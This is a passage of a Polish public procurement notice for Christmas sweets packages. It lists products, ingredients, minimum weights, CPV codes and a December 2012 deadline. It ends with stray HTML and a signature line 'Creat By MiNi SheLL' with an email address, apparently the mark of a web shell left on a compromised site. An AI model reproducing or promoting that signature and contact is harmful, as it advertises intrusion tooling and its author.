Skład wymaganego asortymentu Czekolada mleczna 40% (cukier, mleko pełne w proszku, tłuszcz kakaowy, miazga kakaowa, emulgatory: lecytyny (soja), aromat), cukier, mleko odtłuszczone w proszku, tłuszcze roślinne, masło odwodnione, emulgator: lecytyny (soja), aromat sucha masa mleczna 33%, sucha masa kakaowa 13%.
Waga nie mniej niż 100 g
4.	Nazwa towaru producent wymaganego asortymentu Biszkopty z galaretką owocową - Delicje szampańskie
Skład wymaganego asortymentu Syrop glukozowo-fruktozowy, cukier, czekolada 15% (cukier, miazga kakaowa, tłuszcz kakaowy, emulgatory (lecytyna sojowa, E476), aromat- wanilina), mąka pszenna, jaja, skrobia ziemniaczana, glicerol- substancja utrzymująca wilgotność, olej rzepakowy, substancja żelująca (pektyna), regulatory kwasowości (kwas cytrynowy, kwas jabłkowy, cytrynian sodu, kwas askorbinowy), zagęszczony sok pomarańczowy i rozdrobniona pomarańcza, substancje żelujące (pektyna, guma arabska, guar).
Waga nie mniej niż 294 g
5.	Nazwa towaru producent wymaganego asortymentu Pierniki - Precle w czekoladzie
Skład wymaganego asortymentu czekolada 17% (cukier, miazga kakaowa, tłuszcz kakaowy, tłuszcz roślinny)  mąka pszenna  syrop glukozowo - fruktolinowy  substancja spulchniająca barwnik karmelowy amoniakalny
Waga nie mniej niż 400 g
6.	Nazwa towaru producent wymaganego asortymentu Cukierki Michaszki typu Mieszko
Skład wymaganego asortymentu Wyrób w czekoladzie: orzechy arachidowe,(29,75%), czekolada ( 24%) - cukier, miazga kakaowa, tłuszcz roślinny, tłuszcz mleczny, tłuszcz kakaowy, emulgatory: lecytyna sojowa,E476, Aromat), cukier, mleko w proszku pełne, tłuszcz roślinny utwardzony, kakao o obniżonej zawartości tłuszczu, alkohol, aromat, czekolada - masa kakaowa minimum 40%. Produkt może zawierać śladowe ilości żółtka jaj w proszku, glutenu i innych orzechów, oprócz tłuszczu kakaowego zawiera tłuszcze roślinne.
Waga nie mniej niż 220 g
7.	Nazwa towaru producent wymaganego asortymentu Ptasie mleczko waniliowe Wedel
Skład wymaganego asortymentu Czekolada mleczna 26% (cukier, miazga kakaowa, tłuszcz kakaowy, tłuszcz mleczny, emulgatory:
lecytyna sojowa i E476, aromat), cukier, syrop glukozowy, masło, mleko zagęszczone, białko jaja w proszku, substancja żelująca: agar, regulator kwasowości: kwas cytrynowy, substancja konserwująca E202, aromaty, etylowanilina, ekstrakt z wanilii. Czekolada deserowa: masa kakaowa minimum 47%. Może zawierać śladowe ilości orzechów arachidowych i innych orzechów.
Waga nie mniej niż 420 g
8.	Nazwa towaru producent wymaganego asortymentu Kinder Czekoladki Ferrero
Skład wymaganego asortymentu czekolada mleczna 40% (cukier, mleko pełne w proszku, tłuszcz kakaowy, miazga kakaowa, emulgator: lecytyny (soja); wanilina), cukier, mleko odtłuszczone w proszku, tłuszcz roślinny, masło odwodnione, emulgator: lecytyny (soja); wanilina.
Sucha masa mleczna: 33%,
Składniki kakao: 13%
Waga nie mniej niż 50 g
9.	Nazwa towaru producent wymaganego asortymentu Cukierki M&MS  Choco
Skład wymaganego asortymentu Orzeszki ziemne (23%) oblane mleczną czekoladą (48%), w chrupiących kolorowych skorupkach: cukier, orzeszki ziemne, miazga kakaowa, pełne mleko w proszku, tłuszcz kakaowy, laktoza, serwatka w proszku, skrobia, tłuszcz roślinny, syrop glukozowy, substancja żelująca (guma arabska), emulgatory (lecytyna sojowa, E442), dekstryny, barwniki (E120, E133, E160a, E171), substancja glazurująca (wosk carnauba), aromaty, olej roślinny, sól. Śladowe ilości: orzech laskowy, migdał. Czekolada oprócz tłuszczu kakaowego zawiera tłuszcze roślinne.
Waga nie mniej niż 100 g
10.	Nazwa towaru producent wymaganego asortymentu Cukierki typu Kinder Schoko - Bons
Skład wymaganego asortymentu Czekolada mleczna 50% (cukier, mleko pełne w proszku, tłuszcz kakaowy, miazga kakaowa, emulgator: lecytyna sojowa, aromat), cukier, odtłuszczone mleko w proszku, tłuszcz roślinny, orzechy laskowe (5,8%), masło odwodnione, czekolada (cukier, miazga kakaowa, tłuszcz kakaowy, emulgator: lecytyna sojowa, aromat), substancja glazurująca (guma arabska, szelak), syrop glukozowy, emulgator (lecytyna sojowa), aromaty.
Waga nie mniej niż 125 g
11.	Nazwa towaru producent wymaganego asortymentu Cukierki zozole typu Mieszko
Skład wymaganego asortymentu Cukier, syrop glukozowy, skrobia kukurydziana, syrop cukru inwertowanego, skoncentrowany sok jabłkowy 9%, skrobia pszenna, kwas jabłkowy, kwas cytrynowy, glicerol, aromaty, cytrynian potasu, sól, E171 Dwutlenek tytanu, E150d.
Waga nie mniej niż 
75 g
12.	Nazwa towaru producent wymaganego asortymentu Galaretka owocowa Choinka opolanka
Skład wymaganego asortymentu Cukierki o korpusie z galaretki agarowej o smaku owocowym oblane naturalną czekoladą z dużą zawartością kakao
Waga nie mniej niż 200 g
13.	Nazwa towaru producent wymaganego asortymentu Rodzynki w czekoladzie Jutrzenka
Skład wymaganego asortymentu Rodzynki, czekolada mleczna nie mniej niż 48,5%, masa kakaowa  w czekoladzie mlecznej nie mniej niż 30%
Waga nie mniej niż 80 g
14.	Nazwa towaru producent wymaganego asortymentu Galaretki w czekoladzie - mieszanka wedlowska
Skład wymaganego asortymentu Cukier, syrop skrobiowy, czekolada, kwas cytrynowy (regulator kwasowości), agar (substancja żelująca), koncentraty owocowe, proszek owocowy, może zawierać śladowe ilości orzechów, mleka, jaj, pszenicy.
Waga nie mniej niż 490 g
15.	Nazwa towaru producent wymaganego asortymentu Żelki typu NIM2 Śmiejżelki kwaśne
Skład wymaganego asortymentu Syrop glukozowy, cukier, żelatyna, regulatory kwasowości, kwas mlekowy, kwas cytrynowy, koncentrat soku owocowego, wyciągi z owoców i roślin, aromat identyczny z naturalnym, substancje wzbogacające witaminy: C, niacyna, E, kwas pantotenowy, B6,kwas foliowy, B12, substancje glazurujące: olej roślinny, wosk pszczeli wosk corrauba.
Waga nie mniej niż 100 g
16.	Nazwa towaru producent wymaganego asortymentu Baton Snickers
Skład wymaganego asortymentu Cukier, orzeszki ziemne, syrop glukozowy, tłuszcz roślinny, tłuszcz kakaowy, pełne mleko w proszku, miazga kakaowa, odtłuszczone mleko w proszku, laktoza, serwatka w proszku, tłuszcz mleczny, utwardzony tłuszcz roślinny, sól, emulgator (lecytyna sojowa), białko jaja, zhydrolizowane białko mleka, aromat. Nugatowe nadzienie (14 %) ze świeżo prażonymi orzeszkami ziemnymi (24 %), oblane karmelem (27 %) i mleczną czekoladą (35 %).
Waga nie mniej niż 51 g
17.	Nazwa towaru producent wymaganego asortymentu Ciastka Hit kakao Bahlsen
Skład wymaganego asortymentu Markizy Hit wypełnione ciemnobrązowym kremem o smaku kakao, doskonale komponującym się ze smakiem herbatnika. Aromaty, cukier, jaja w proszku, kakao, kwas cytrynowy, mleko w proszku, mąka pszenna, serwatka w proszku, substancje spulchniające, syrop glukozowo-fruktozowy, sól, tłuszcz roślinny.
Waga nie mniej niż 250 g
18.	Nazwa towaru producent wymaganego asortymentu Kalendarz adwentowy
Waga nie mniej niż 65g
19.	Nazwa towaru producent wymaganego asortymentu Pudełko z twardej tektury z motywem świątecznym
UWAGA:
Zamawiający nie dopuszcza produktów czekolado podobnych i w opakowaniach zastępczych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.21.00-3, 15.84.22.00-4, 15.81.21.00-4, 15.84.23.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com